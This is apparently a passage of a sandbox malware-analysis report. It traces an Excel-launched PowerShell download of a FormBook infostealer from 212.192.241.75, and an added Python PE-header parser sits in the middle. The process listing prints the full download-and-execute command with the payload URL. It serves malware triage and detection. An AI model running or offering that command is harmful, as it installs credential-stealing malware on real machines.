Oct 27, 2021 18:19:34.321764946 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321780920 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321791887 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.321798086 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321814060 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321831942 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321846008 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.321856976 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321868896 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.321870089 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321887970 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321904898 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321913958 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.321923971 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321957111 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.349490881 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.349515915 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.349617958 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.349888086 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.349910975 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.349925041 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.349942923 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.349963903 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.349981070 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350001097 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350013971 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350022078 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.350027084 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350042105 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.350045919 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350059032 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350073099 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350092888 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350109100 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350126028 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350142002 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350158930 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350178003 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350182056 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.350194931 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350197077 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.350213051 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350229025 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350235939 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.350246906 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350255013 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.350266933 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350284100 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350300074 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350316048 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350317955 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.350331068 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350346088 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.350348949 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350367069 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350382090 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350383997 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.350399017 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350415945 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350431919 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350433111 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.350449085 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350455046 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.350466967 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350482941 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350488901 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.350495100 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350507021 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.350601912 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.380295992 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • 212.192.241.75

                                                                                                                                                    HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49746 | 212.192.241.75 | 80 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Oct 27, 2021 18:19:34.262244940 CEST | 1166 | OUT | GET /sam/new3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: 212.192.241.75
Connection: Keep-Alive
Oct 27, 2021 18:19:34.293471098 CEST | 1168 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 27 Oct 2021 16:19:34 GMT
                                                                                                                                                    Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
                                                                                                                                                    Last-Modified: Tue, 26 Oct 2021 23:46:46 GMT
                                                                                                                                                    ETag: "41504-5cf4a171fd45b"
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 267524
                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 9c f1 03 00 68 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 
00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$0(QFQFQF*^QFQGqQF*^QFrvQF.W@QFRichQFPELe:V\0p@th#p|.textZ\ `.rdatap`@@.data8r@.ndataP.rsrcx@@
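The response above is the second-stage payload itself: the server labels the body application/x-msdownload and it begins with an MZ header, and it is the file PowerShell writes to the Public profile as eVJOpc.exe (the process listing further down reports it at image base 0x400000 with a file size of 267524 bytes, the same as the Content-Length). The following Python is an added example, written for this edit and not part of the Joe Sandbox report, that parses the header bytes transcribed from the Data Raw dump above (the dump stops at the end of the section table, so nothing after it is parsed). The offset arithmetic follows the PE/COFF format; the only inference beyond it is the comment that a .ndata section is characteristic of NSIS-built installers, which is the editor's reading of the section name and not something the report states.

```python
import struct
from datetime import datetime, timezone
from typing import Optional

# First 0x288 bytes of the response body (new3.exe, later dropped as eVJOpc.exe),
# transcribed from the report's "Data Raw" dump: DOS header and stub, Rich header,
# PE signature, COFF and optional headers, 16 data directories, 5 section headers.
PE_HEADER_HEX = (
    "4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000"  # 0x000 DOS header
    "00000000 00000000 00000000 00000000 00000000 00000000 00000000 c8000000"  # 0x020 e_lfanew=0xc8
    "0e1fba0e 00b409cd 21b8014c cd215468 69732070 726f6772 616d2063 616e6e6f"  # 0x040 DOS stub
    "74206265 2072756e 20696e20 444f5320 6d6f6465 2e0d0d0a 24000000 00000000"  # 0x060
    "ad302881 e95146d2 e95146d2 e95146d2 2a5e19d2 eb5146d2 e95147d2 715146d2"  # 0x080 Rich header
    "2a5e1bd2 e65146d2 bd7276d2 e35146d2 2e5740d2 e85146d2 52696368 e95146d2"  # 0x0a0
    "00000000 00000000 50450000 4c010500 653aff56 00000000 00000000 e0000f01"  # 0x0c0 PE\0\0, COFF
    "0b010600 005c0000 00d60100 00040000 fb300000 00100000 00700000 00004000"  # 0x0e0 optional hdr
    "00100000 00020000 04000000 06000000 04000000 00000000 00e00200 00040000"  # 0x100
    "00000000 02000080 00001000 00100000 00001000 00100000 00000000 10000000"  # 0x120
    "00000000 00000000 18740000 a0000000 00d00200 e0090000 00000000 00000000"  # 0x140 data dirs
    "9cf10300 68230000 00000000 00000000 00000000 00000000 00000000 00000000"  # 0x160 security dir
    "00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000"  # 0x180
    "00700000 7c020000 00000000 00000000 00000000 00000000 00000000 00000000"  # 0x1a0 IAT dir
    "2e746578 74000000 eb5a0000 00100000 005c0000 00040000 00000000 00000000"  # 0x1c0 .text
    "00000000 20000060 2e726461 74610000 96110000 00700000 00120000 00600000"  # 0x1e0 .rdata
    "00000000 00000000 00000000 40000040 2e646174 61000000 38b00100 00900000"  # 0x200 .data
    "00060000 00720000 00000000 00000000 00000000 400000c0 2e6e6461 74610000"  # 0x220 .ndata
    "00800000 00500200 00000000 00000000 00000000 00000000 00000000 800000c0"  # 0x240
    "2e727372 63000000 e0090000 00d00200 000a0000 00780000 00000000 00000000"  # 0x260 .rsrc
    "00000000 40000040"                                                         # 0x280
)
PE_HEADER = bytes.fromhex(PE_HEADER_HEX)

DIRECTORY_NAMES = ("export", "import", "resource", "exception", "security", "basereloc",
                   "debug", "architecture", "globalptr", "tls", "loadconfig",
                   "bound_import", "iat", "delay_import", "clr", "reserved")


def parse_pe_headers(data: bytes, content_length: Optional[int] = None) -> dict:
    """Parse a PE32 header prefix and derive the facts a triage analyst looks for."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, characteristics = \
        struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry_point = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    num_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = {}
    for i, name in enumerate(DIRECTORY_NAMES[:num_dirs]):
        rva, size = struct.unpack_from("<II", data, opt + 96 + 8 * i)
        if size:
            dirs[name] = (rva, size)
    sections = []
    table = opt + opt_size
    for i in range(nsections):
        raw = data[table + 40 * i: table + 40 * (i + 1)]
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", raw, 8)
        chars = struct.unpack_from("<I", raw, 36)[0]
        sections.append({"name": raw[:8].rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "va": va, "rawsize": rawsize, "rawptr": rawptr,
                         "exec": bool(chars & 0x20000000), "write": bool(chars & 0x80000000)})
    names = [s["name"] for s in sections]
    # The security directory's "RVA" is a file offset; an Authenticode table is the
    # last thing in a file, so its end should equal the file size unless bytes were
    # appended. Anything between the last section's raw data and that table is overlay.
    cert_offset, cert_size = dirs.get("security", (0, 0))
    return {
        "machine": machine, "timestamp": timestamp,
        "timestamp_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
        "num_sections": nsections, "entry_point": entry_point, "image_base": image_base,
        "size_of_image": size_of_image, "subsystem": subsystem,
        "relocs_stripped": bool(characteristics & 0x0001),   # IMAGE_FILE_RELOCS_STRIPPED
        "aslr": bool(dll_chars & 0x0040),                     # DYNAMIC_BASE
        "nx": bool(dll_chars & 0x0100),                       # NX_COMPAT
        "directories": dirs, "sections": sections, "section_names": names,
        "looks_like_nsis": ".ndata" in names,                 # section name typical of NSIS stubs
        "overlay_offset": max(s["rawptr"] + s["rawsize"] for s in sections),
        "certificate": (cert_offset, cert_size),
        "certificate_ends_at_eof": content_length is not None
                                   and cert_offset + cert_size == content_length,
    }


if __name__ == "__main__":
    for key, value in parse_pe_headers(PE_HEADER, content_length=267524).items():
        if key != "sections":
            print(f"{key}: {value:#x}" if isinstance(value, int) and not isinstance(value, bool) else f"{key}: {value}")
```

Run against the dump, this reports an i386 PE32 GUI image with relocations stripped and neither DYNAMIC_BASE nor NX_COMPAT set (which is why the sandbox sees it at its preferred base 0x400000), an .ndata section, a certificate table at file offset 0x3f19c whose 0x2368 bytes end exactly at the 267524-byte Content-Length, and an overlay starting at 0x8200 between the section data and that table. The presence of a certificate directory says nothing about whether the signature is valid or whom it names; that requires the trailing bytes, which the dump does not include.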


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    Behavior

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:18:19:06
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0xa20000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:18:19:10
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
                                                                                                                                                    Imagebase:0x330000
                                                                                                                                                    File size:430592 bytes
                                                                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:18:19:10
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff7f20f0000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:18:19:35
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Windows\system32\explorer.exe' C:\Users\Public\eVJOpc.exe
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:3611360 bytes
                                                                                                                                                    MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:18:19:36
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                    Imagebase:0x7ff720ea0000
                                                                                                                                                    File size:3933184 bytes
                                                                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:18:19:38
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Users\Public\eVJOpc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Users\Public\eVJOpc.exe'
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:267524 bytes
                                                                                                                                                    MD5 hash:0EDC34831B45EDED59BD2AEEF85AA41B
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    • Detection: 50%, ReversingLabs
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:18:19:40
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Users\Public\eVJOpc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Users\Public\eVJOpc.exe'
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:267524 bytes
                                                                                                                                                    MD5 hash:0EDC34831B45EDED59BD2AEEF85AA41B
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:18:19:47
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
Commandline:C:\Windows\Explorer.EXE
Imagebase:0x7ff720ea0000
File size:3933184 bytes
MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
